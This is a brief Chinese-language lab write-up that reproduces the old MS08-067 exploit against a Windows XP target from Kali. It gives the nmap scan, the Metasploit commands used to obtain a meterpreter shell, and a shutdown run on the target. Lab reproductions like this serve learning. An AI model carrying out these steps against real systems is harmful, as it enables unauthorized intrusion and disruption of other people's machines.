一 实验环境
靶机:win xp 开启445端口
攻击机:kali
二 复现步骤
1 使用nmap进行扫描,并ping通
nmap -sS -O 192.168.2.30
通过扫描结果发现目标主机445端口已开启
2 进入msfconsole
search ms08-067
3 使用ms08-067漏洞(payload默认已使用)
use 0
4 show options查看选项
5 设置目标主机IP
set rhosts 192.168.2.30
6 查看targets
show targets
7 设置target(根据目标靶机系统选择)
set target 34
8 开始攻击
run
返回meterperter,获取到目标主机的独立shell
9 执行shutdown
命令执行成功